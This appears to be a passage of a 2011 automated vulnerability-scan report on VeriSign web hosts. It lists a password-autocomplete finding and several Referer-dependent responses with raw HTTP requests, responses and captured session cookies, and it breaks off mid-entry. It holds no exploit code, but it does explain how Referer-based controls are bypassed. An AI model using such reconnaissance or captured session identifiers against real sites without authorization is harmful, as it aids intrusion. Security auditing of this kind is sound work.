HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:30:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:30:44 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 34637 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.43. https://www.verisign.com/products-services/index.html
Summary
Severity: Low
Confidence: Certain
Host: https://www.verisign.com
Path: /products-services/index.html
Issue detail
The page contains a form with the following action URL: https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /products-services/index.html HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://securitycenter.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:46 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 107427 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
12. Referer-dependent response
There are 7 instances of this issue:
Issue description
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
- Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
- Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
- Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing. If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.
12.1. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_red.png
Summary
Severity: Information
Confidence: Firm
Host: http://blogs.verisign.com
Path: /authweb/global/assets/shared/images/nav/arrow_red.png
Request 1
GET /authweb/global/assets/shared/images/nav/arrow_red.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 1159 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. The link on the <a href="http://blogs.verisign.com/%3ftid=footer">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://blogs.verisign.com/%3ftid=footer">that page</a> about the error. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:10 2011<br /> Apache</span> </address> </body> </html>
Request 2
GET /authweb/global/assets/shared/images/nav/arrow_red.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:16 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 996 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:16 2011<br /> Apache</span> </address> </body> </html>
12.2. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_white.png
Summary
Severity: Information
Confidence: Firm
Host: http://blogs.verisign.com
Path: /authweb/global/assets/shared/images/nav/arrow_white.png
Request 1
GET /authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 1159 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. The link on the <a href="http://blogs.verisign.com/%3ftid=footer">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://blogs.verisign.com/%3ftid=footer">that page</a> about the error. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:10 2011<br /> Apache</span> </address> </body> </html>
Request 2
GET /authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:16 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 996 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:16 2011<br /> Apache</span> </address> </body> </html>
12.3. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png
Summary
Severity: Information
Confidence: Firm
Host: http://blogs.verisign.com
Path: /authweb/global/assets/shared/images/nav/nav_grad.png
Request 1
GET /authweb/global/assets/shared/images/nav/nav_grad.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 1159 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. The link on the <a href="http://blogs.verisign.com/%3ftid=footer">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://blogs.verisign.com/%3ftid=footer">that page</a> about the error. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:10 2011<br /> Apache</span> </address> </body> </html>
Request 2
GET /authweb/global/assets/shared/images/nav/nav_grad.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:17 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 996 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:17 2011<br /> Apache</span> </address> </body> </html>
12.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png
Summary
Severity: Information
Confidence: Firm
Host: http://blogs.verisign.com
Path: /authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png
Request 1
GET /authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 1159 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. The link on the <a href="http://blogs.verisign.com/%3ftid=footer">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://blogs.verisign.com/%3ftid=footer">that page</a> about the error. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:10 2011<br /> Apache</span> </address> </body> </html>
Request 2
GET /authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:26 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 996 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:26 2011<br /> Apache</span> </address> </body> </html>
12.5. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_left.png
Summary
Severity: Information
Confidence: Firm
Host: http://blogs.verisign.com
Path: /authweb/global/assets/shared/images/nav/nav_left.png
Request 1
GET /authweb/global/assets/shared/images/nav/nav_left.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 1159 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. The link on the <a href="http://blogs.verisign.com/%3ftid=footer">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://blogs.verisign.com/%3ftid=footer">that page</a> about the error. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:10 2011<br /> Apache</span> </address> </body> </html>
Request 2
GET /authweb/global/assets/shared/images/nav/nav_left.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:16 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 996 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:16 2011<br /> Apache</span> </address> </body> </html>
12.6. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_right.png
Summary
Severity: Information
Confidence: Firm
Host: http://blogs.verisign.com
Path: /authweb/global/assets/shared/images/nav/nav_right.png
Request 1
GET /authweb/global/assets/shared/images/nav/nav_right.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive Referer: http://blogs.verisign.com/?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 1159 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. The link on the <a href="http://blogs.verisign.com/%3ftid=footer">referring page</a> seems to be wrong or outdated. Please inform the author of <a href="http://blogs.verisign.com/%3ftid=footer">that page</a> about the error. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:10 2011<br /> Apache</span> </address> </body> </html>
Request 2
GET /authweb/global/assets/shared/images/nav/nav_right.png HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:16 GMT Server: Apache Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Connection: close Content-Length: 996 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l...[SNIP]... <p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p> <p> If you think this is a server error, please contact the <a href="mailto:root@localhost">webmaster</a>. </p> <h2>Error 404</h2> <address> <a href="/">blogapp</a><br /> <span>Fri Sep 9 21:26:16 2011<br /> Apache</span> </address> </body> </html>
12.7. http://sales.liveperson.net/hc/2735064/
Summary
Severity: Information
Confidence: Firm
Host: http://sales.liveperson.net
Path: /hc/2735064/
Request 1
GET /hc/2735064/?&site=2735064&cmd=mTagInviteShown&lpCallId=320617608027-425706728594&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:34:11 GMT Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:34:11 GMT; path=/hc/2735064; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 343 lpConnLib.Process({"ResultSet": {"lpCallId":"320617608027-425706728594","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
Request 2
